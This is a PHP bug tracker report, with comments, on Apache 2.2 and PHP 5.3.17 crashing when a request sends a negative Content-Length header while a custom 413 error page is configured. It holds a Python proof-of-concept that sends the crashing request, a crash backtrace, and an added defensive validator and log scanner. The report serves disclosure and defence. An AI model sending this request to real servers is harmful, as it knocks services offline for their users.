ID: 63200
Comment by: thomas at partyflock dot nl
Reported by: chris at whyley dot com
Summary: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
Status: Open
Type: Bug
Package: Reproducible crash
Operating System: Windows Server 2003
PHP Version: 5.3.17
Block user comment: N
Private report: N

New Comment:

I had this in 5.4.4 on my production servers but not on an identical test server, which runs on a local domain but uses the same (version) php, apache and modules. The test server always returns a normal 200 page though, don't ask me why. Removing the custom ErrorDocument indeed solves the problem.

Previous Comments:
------------------------------------------------------------------------
[2013-02-18 11:08:42] chris at whyley dot com

Re-opening this bug as it still exists in the 5.3 stream.

------------------------------------------------------------------------
[2013-02-18 00:36:03] php-bugs at lists dot php dot net

No feedback was provided. The bug is being suspended because we assume that you are no longer experiencing the problem. If this is not the case and you are able to provide the information that was requested earlier, please do so and change the status of the bug back to "Open". Thank you.

------------------------------------------------------------------------
[2012-10-05 10:26:01] chris at whyley dot com

I have not tested this issue under version 5.4 as my environment is set up for 5.3.17 - are you able to recreate it in 5.3.17? It always crashes no matter what I have in index.php - in fact I can call any page and cause the crash to happen.

------------------------------------------------------------------------
[2012-10-05 04:26:26] larue...@php.net

I can not reproduce this with 5.4, and from the backtrace it seems to crash in another place. So, is it related to your index.php? Does it always crash no matter what the index.php is?
------------------------------------------------------------------------
[2012-10-02 14:45:02] chris at whyley dot com

Description:
------------
Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following:

(1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf:

ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate".

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size - instead of posting an accurate filesize for the Content-Length header they use a negative integer instead, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DoS attacks on vulnerable systems.

Test script:
---------------
#!/usr/bin/env python3
# Sends a single GET request carrying a negative Content-Length header
# (plus "Accept-Encoding: gzip, deflate") to trigger the crash described above.
import socket
import sys

target = "10.211.55.3"
port = 80

# Bare "\n" line endings are kept from the original script; Apache accepts them.
request = "GET / HTTP/1.1\n"
request += "Host: " + target + "\n"
request += "Accept-Encoding: gzip, deflate\n"
request += "Content-Length: -1\n\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
except OSError:
    print("[-] Connection to %s:%s failed!" % (target, port))
    sys.exit(0)

print("[+] Sending HTTP request. Check for crash on target.")
s.sendall(request.encode("ascii"))
s.close()

Expected result:
----------------
Stable Apache, no crash.
Actual result:
--------------
Thread 2 - System ID 3008
Entry point: msvcrt!_endthreadex+3a
Create time: 10/2/2012 2:29:08 PM
Time spent in user mode: 0 Days 0:0:0.0
Time spent in kernel mode: 0 Days 0:0:0.15

Full Call Stack
Function  Arg 1  Arg 2  Arg 3  Arg 4  Source
php5ts!zend_hash_index_find+17  016f3460 0000000d 018ee6c0 00000000  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985
php5ts!_zend_list_delete+27  0000000d 016b0150 029811c0 016b0150  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27
php5ts!_php_stream_free+ae  029811c0 00000003 016b0150 029811c0  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a
php5ts!php_zend_stream_mmap_closer+1a  029811c0 016b0150 0290a4e0 007339f4  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9
php5ts!zend_file_handle_dtor+2a  0290a4e8 016b0150 00000000 00000000  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8
php5ts!file_handle_dtor+14  0290a4e8 018ee828 018ee798 00000000  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b
php5ts!zend_llist_del_element+71  016b1754 018ee828 007d9810 016b0150  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36
php5ts!zend_destroy_file_handle+26  018ee828 016b0150 016b0150 016b0150  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 242
php5ts!zend_execute_scripts+c4  00000002 016b0150 00000000 00000001  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234
php5apache2_2!php_handler+64c  00fba200 006348e0 00fba200 00000000  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 + 13
libhttpd!ap_run_handler+25  00fba200 6eed3de0 00fba200 00634f68
libhttpd!ap_invoke_handler+b0  00000000 00fb8938 018ee8f8 6ff0ef68
libhttpd!ap_internal_redirect+37  00634f68 00fb8938 00eb6c50 0000019d
libhttpd!ap_die+1e8  00fb8938 00000000 00000001 00fba118
libhttpd!ap_http_header_filter+9f  00fb96f8 00fba118 00fba118 018ee974
libhttpd!ap_pass_brigade+52  00fb96f8 00fba118 00000000 00fba118
libhttpd!ap_content_length_filter+a9  00fb96e0 00eb6cb0 00fb96c8 018ee9e0
libhttpd!ap_pass_brigade+52  00fb96e0 00fba118 6fba4309 00fba118
libhttpd!ap_byterange_filter+474  00fb96c8 00fba118 00fba060 018eea1c
libhttpd!ap_pass_brigade+52  00fb96c8 00fba118 00eb6cb0 00fba118
mod_deflate+1352  00fba060 00fba118 00fba0c0 018eea58
libhttpd!ap_pass_brigade+52  00fba060 00fba118 00fba080 00fba190
mod_deflate+1aa1  00fc5a48 00fba1b0 00fba190 018eea84
libhttpd!ap_pass_brigade+52  00fc5a48 00fba190 00fb9938 00fba190
libhttpd!ap_old_write_filter+5b  00fba080 00fba190 00fba190 018eeab4
libhttpd!ap_pass_brigade+52  00fba080 00fba190 00fb9878 00fba138
libhttpd!ap_set_etag+b28  00fba138 00fb9938 0000019d 6ff37324
libhttpd!ap_set_etag+2bb  00fba190 00fb9e08 00000000 00000000
libhttpd!ap_get_brigade+24  00fb9938 00fb9e08 00000000 00000000
php5apache2_2!php_apache_sapi_read_post+3d  018eeb68 00000f9f 00000f9f 016b0150  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 201 + 1a
php5ts!sapi_deactivate+6f  016b0150 016b0150 00000000 00fb8938  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\sapi.c @ 423 + d
php5ts!php_request_shutdown+3a6  00000000 00000004 00637170 00fb8938  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1670 + 6
php5apache2_2!php_handler+6b1  00fb8938 006348e0 00fb8938 00000000  c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 682
libhttpd!ap_run_handler+25  00fb8938 00fb8938 00fb8938 00000000
libhttpd!ap_invoke_handler+b0  00000000 00fb7958 018eff38 6ff0adbc
libhttpd!ap_die+29e  00fb8938 00000000 006535b0 00fb7958
libhttpd!ap_get_request_note+1d0c  00fb7958 00fb7958 00fb7958 00000001
libhttpd!ap_run_process_connection+25  00fb7958 005c4488 018eff80 6ff1df6c
libhttpd!ap_process_connection+33  00fb7958 00eb49f8 7c911086 00eb0448
libhttpd!ap_regkey_value_remove+c7c  00fb7950 7c911086 7c9101db 00ea2120
msvcrt!_endthreadex+a9  00ea2120 7c911086 7c9101db 00ea2120
kernel32!BaseThreadStart+37  77c3a341 00ea2120 00000000 00000000

Exception Information
PHP5TS!ZEND_HASH_INDEX_FIND+17
In httpd__PID__3560__Date__10_02_2012__Time_02_29_32PM__453__Second_Chance_Exception_C0000005.dmp the assembly instruction at php5ts!zend_hash_index_find+17 in C:\Core\PHP-5317\php5ts.dll from The PHP Group has caused an access violation exception (0xC0000005) when trying to read from memory location 0x0d3e2d2d on thread 2

------------------------------------------------------------------------
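Added example (Python 3). This is not code from the bug report and not code from the Apache or PHP projects; it models the two checks a practitioner would want around this report: validating the Content-Length request header the way a front end or reverse proxy should (RFC 7230 section 3.3.2 defines it as 1*DIGIT, so a negative integer such as the "-1" in the test script is not a length at all), and scanning an Apache 2.2 error_log for the crash signature quoted in the description, an "Invalid Content-Length" error followed shortly by a child exiting with status 3221225477 (0xC0000005). The MAX_BODY_BYTES limit, the 30-second correlation window and the error_log regex are assumptions; the sample log lines are the two lines from the report.

```python
# Added example, not from the bug report or the Apache/PHP sources.
# Assumptions: MAX_BODY_BYTES, the correlation window and LOG_RE are chosen
# here for illustration; the sample log lines are copied from the report.
import re
from datetime import datetime, timedelta

# Assumed upper bound on request bodies for the front-end check.
MAX_BODY_BYTES = 2 * 1024 ** 3

# Apache 2.2 error_log layout: [timestamp] [level] [client addr] message
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] "
    r"(?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$"
)
TS_FMT = "%a %b %d %H:%M:%S %Y"
# 3221225477 == 0xC0000005 == STATUS_ACCESS_VIOLATION, the exit status in the report.
CRASH_STATUS = 3221225477
CRASH_MSG = "child process exited with status %d" % CRASH_STATUS
DIGITS = re.compile(r"^[0-9]+$")


def parse_content_length(values):
    """Return the declared body length as an int, or None if the header is invalid.

    values: every Content-Length field value seen on the request, in order.
    Rejects anything that is not ASCII digits ("-1", "+1", " 1", "1e3"),
    and rejects repeated values that disagree; identical repeats are allowed.
    """
    if not values:
        return None
    lengths = set()
    for v in values:
        if not DIGITS.match(v):
            return None
        lengths.add(int(v))
    if len(lengths) != 1:
        return None
    return lengths.pop()


def classify_request_length(values, max_bytes=MAX_BODY_BYTES):
    """Map the Content-Length header to the HTTP status a front end should return.

    400 for a malformed header (including the negative value from this report),
    413 for a well-formed value above max_bytes, otherwise 200 (accept).
    """
    n = parse_content_length(values)
    if n is None:
        return 400
    if n > max_bytes:
        return 413
    return 200


def find_crash_signature(lines, window=timedelta(seconds=30)):
    """Correlate 'Invalid Content-Length' errors with a child access violation.

    Returns a list of (client, error_time, crash_time) tuples, one for each
    'Invalid Content-Length' line followed within `window` by a parent notice
    that a child exited with status 3221225477.
    """
    pending = []   # (timestamp, client) of recent Invalid Content-Length errors
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), TS_FMT)
        msg = m.group("msg")
        if msg.startswith("Invalid Content-Length"):
            pending.append((ts, m.group("client")))
        elif CRASH_MSG in msg:
            for err_ts, client in pending:
                if timedelta(0) <= ts - err_ts <= window:
                    hits.append((client, err_ts, ts))
            pending = []
    return hits


# Constructed sample: the two error_log lines quoted in the report.
SAMPLE_LOG = [
    "[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length",
    "[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited "
    "with status 3221225477 -- Restarting.",
]

if __name__ == "__main__":
    for values in (["-1"], ["42"], ["5", "5"], ["5", "6"], [str(3 * 1024 ** 3)]):
        print(values, "->", classify_request_length(values))
    for client, err_ts, crash_ts in find_crash_signature(SAMPLE_LOG):
        print("crash signature: client %s, error at %s, child died at %s"
              % (client, err_ts, crash_ts))
```

Rejecting the malformed header with a 400 in front of Apache keeps the request from ever reaching the ErrorDocument 413 redirect that the report identifies as the trigger; the log correlation is a cheap way to confirm whether an existing server is being hit by it.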